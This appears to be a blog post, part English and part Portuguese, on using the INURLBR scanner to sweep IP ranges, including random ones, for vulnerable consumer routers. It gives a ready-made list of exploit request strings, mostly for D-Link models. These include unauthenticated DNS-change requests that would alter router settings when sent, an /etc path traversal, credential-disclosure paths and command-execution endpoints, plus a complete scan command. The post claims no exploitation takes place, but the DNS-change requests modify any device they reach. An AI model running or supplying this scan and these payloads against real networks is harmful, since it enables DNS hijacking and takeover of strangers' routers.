Using INURLBR Scanner For searching routers to Exploit

In this short article we will use the INURLBR tool for searching  Routers  in certain ip ranges.

The tool has methods that generate IP ranges or X amount of ip random. Separated several exploits routers, so we can use the method of INURLBR tool called SUB_PROCESS SUB_PROCESS - Consiste em concatenar uma serie de strings com base de um arquivo predefinido. Download tool INURLBR: https://github.com/googleinurl/SCANNER-INURLBR SUB_PROCESS - consists of a series of concatenate strings on the basis of a predefined file. With concatenation process made the tool sends the request against its target to make possible the validation. We will use methods get and validate if the request was successfully executed retonando code 200. There will be no exploitation, let's just filtering routers. Creating SUB_PROCESS file First we must create our file with the exploration of strings that will be used by SUB_PROCESS Primeiro devemos criar nosso arquivo com as strings de exploração que serão usadas pelo SUB_PROCESS.

The tool has methods that generate IP ranges or X amount of ip random.
Separated several exploits routers, so we can use the method of INURLBR tool called SUB_PROCESS
SUB_PROCESS – Consiste em concatenar uma serie de strings com base de um arquivo predefinido.

Download tool INURLBR:
https://github.com/googleinurl/SCANNER-INURLBR

SUB_PROCESS – consists of a series of concatenate strings on the basis of a predefined file. With concatenation process made the tool sends the request against its target to make possible the validation.

We will use methods get and validate if the request was successfully executed retonando code 200.
There will be no exploitation, let’s just filtering routers.

Creating SUB_PROCESS file
First we must create our file with the exploration of strings that will be used by SUB_PROCESS
Primeiro devemos criar nosso arquivo com as strings de exploração que serão usadas pelo SUB_PROCESS.

File content:
/dnscfg.cgi?dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1
/dns_1?Enable_DNSFollowing=1&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8
/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP
/dvr/wwwroot/user.cgi
/web_cgi.cgi?&request=UploadFile&path=/etc/
/dnscfg.cgi?dnsSecondary=8.8.4.4&dnsIfcsList=&dnsRefresh=1
/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=
/dnscfg.cgi?dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1
/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP
/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=8.8.4.4&dnsSecondary=$3
/html/tUserAccountControl.htm
/common/info.cgi
/hedwig.cgi
/tools_admin.asp
/hnap.cgi
/scdmz.cmd?&fwFlag=50853375&dosenbl=1
/cliget.cgi?cmd=help
/scgi-bin/platform.cgi
/soap.cgi
/dws/api/ListFile?id=admin&tok=&volid=1&path=usb_dev/usb_A1/../../../../etc
/command.php
/authentication.cgi

Each line of the file will be concatenated with the IP target thus effecting request testing to validate that return code http.
Cada linha do arquivo será concatenada com o alvo IP assim efetuando teste de request para validar se retorno do código http.
Example:
http://TARGET/{STRING_SUB_PROCESS}
 
http://200.16.3.***/dnscfg.cgi?dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1/dns_1?
http://200.16.3.***/tools_admin.asp
If the HTTP server return code 200 means that such a request has been successfully performed.
Se o código http do servidor retornar 200 significa que tal requisição foi efetuada com sucesso.
if(HTTP_CODE == 200){
VULN
}
Now let’s create our command to run the tool INURLBR.
By setting command:
SET RANGE IP:
RANGE IP:
 –range Set range IP.
      Example: –range {range_start,rage_end}
      Usage:   –range ‘172.16.0.5,172.16.0.255’
OR
RANGE IP RANDOM:
 –range-rand Set amount of random ips.
      Example: –range-rand {rand}
      Usage:   –range-rand ’50’
SET FILE OUTPUT:
-s vuln.txt
SET FILE SUB_PROCESS:
–sub-file  Subprocess performs an injection
     strings in URLs found by the engine, via GET or POST.
     Example: –sub-file {youfile}
     Usage:   –sub-file exploits_get.txt
SET TYPE OF REQUEST –  SUB_PROCESS:
 –sub-get defines whether the strings coming from
     –sub-file will be injected via GET.
     Usage:   –sub-get
SET VALIDATION HTTP CODE:
 –ifcode Valid results based on your return http code.
      Example: –ifcode {ifcode}
      Usage:   –ifcode 200
SET TIME-OUT:
 –time-out Timeout to exit the process.
      Example: –time-out {second}
      Usage:   –time-out 3
COMPLETE COMMAND:
php inurlbr.php –range ‘172.1.0.1,172.1.0.163’ -s vuln.txt  –sub-file ‘string_exploits.txt’ –sub-get –ifcode 200
print output:
COMPLETE COMMAND: php inurlbr.php --range '172.1.0.1,172.1.0.163' -s vuln.txt --sub-file 'string_exploits.txt' --sub-get --ifcode 200 print output:
Strings exploits used:

All exploits cited already have packages fix.

Exploit_model: Shuttle Tech ADSL Modem-Router 915 WM / Unauthenticated Remote DNS Change
STRING GET: /dnscfg.cgi?dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1
http://www.exploit-db.com/exploits/35995/

Exploit_model: D-Link DSL-2740R / Unauthenticated Remote DNS Change Exploit
STRING GET: /dns_1?Enable_DNSFollowing=1&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8
http://www.exploit-db.com/exploits/35917/

Exploit_model: D-Link DSL-2640B Unauthenticated Remote DNS Change Exploit
STRING GET: /ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP
http://1337day.com/exploit/23302/

Exploit_model: LG DVR LE6016D / Unauthenticated users/passwords disclosure exploitit
STRING GET: /dvr/wwwroot/user.cgi
http://www.exploit-db.com/exploits/36014/

Exploit_model: D-Link DSP-W w110 v1.05b01 – Multiple Vulnerabilities
STRING GET: /web_cgi.cgi?&request=UploadFile&path=/etc/
https://www.exploit-db.com/exploits/37454/

Exploit_model: D-Link DSL-2780B DLink_1.01.14 – Unauthenticated Remote DNS Change
STRING GET: /dnscfg.cgi?dnsSecondary=8.8.4.4&dnsIfcsList=&dnsRefresh=1
https://www.exploit-db.com/exploits/37237/

Exploit_model: D-Link DSL-2730B AU_2.01 – Authentication Bypass DNS Change
STRING GET: /dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=
https://www.exploit-db.com/exploits/37240/

Exploit_model: D-Link DSL-526B ADSL2+ AU_2.01 – Unauthenticated Remote DNS Change
STRING GET: /dnscfg.cgi?dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1
https://www.exploit-db.com/exploits/37241/

Exploit_model: D-Link DSL-2640B – Unauthenticated Remote DNS Change Exploit
STRING GET: /ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP
https://www.exploit-db.com/exploits/36105/

Exploit_model: D-Link DSL-2740R – Unauthenticated Remote DNS Change Exploit
STRING GET: /Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8
https://www.exploit-db.com/exploits/35917/

Exploit_model: D-Link AP 3200 – Multiple Vulnerabilities
STRING GET: /html/tUserAccountControl.htm
https://www.exploit-db.com/exploits/34206/

Exploit_model: D-Link info.cgi POST Request Buffer Overflow
STRING GET: /common/info.cgi
https://www.exploit-db.com/exploits/34063/

Exploit_model: D-Link hedwig.cgi Buffer Overflow in Cookie Header
STRING GET: /hedwig.cgi
https://www.exploit-db.com/exploits/33863/

Exploit_model: DGL-5500, DIR-855L and the DIR-835:
STRING GET: /tools_admin.asp
https://www.exploit-db.com/exploits/33520/

Exploit_model: D-Link models DGL-5500, DIR-855L, DIR-835 suffer
STRING GET: /hnap.cgi
https://www.exploit-db.com/exploits/33520/

Exploit_model: D-Link DSL-2750B ADSL Router – CSRF Vulnerability
STRING GET: /scdmz.cmd?&fwFlag=50853375&dosenbl=1
https://www.exploit-db.com/exploits/31569/

Exploit_model: D-Link DIR-100 – Multiple Vulnerabilities
STRING GET: /cliget.cgi?cmd=help
https://www.exploit-db.com/exploits/31425/

Exploit_model: D-Link DSR Router Series – Remote Root Shell Exploit
STRING GET: /scgi-bin/platform.cgi
https://www.exploit-db.com/exploits/30062/

Exploit_model: D-Link Devices UPnP SOAP Telnetd Command Execution
STRING GET: /soap.cgi
https://www.exploit-db.com/exploits/28333/

Exploit_model: D-Link DIR-505 1.06 – Multiple Vulnerabilities
STRING GET: /dws/api/ListFile?id=admin&tok=&volid=1&path=usb_dev/usb_A1/../../../../etc
https://www.exploit-db.com/exploits/28184/

Exploit_model: D-Link Devices Unauthenticated Remote Command Execution
STRING GET: /command.php
https://www.exploit-db.com/exploits/27528/

Exploit_model: D-Link DIR-645 1.03B08 – Multiple Vulnerabilities
STRING GET: /authentication.cgi
https://www.exploit-db.com/exploits/27283/

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s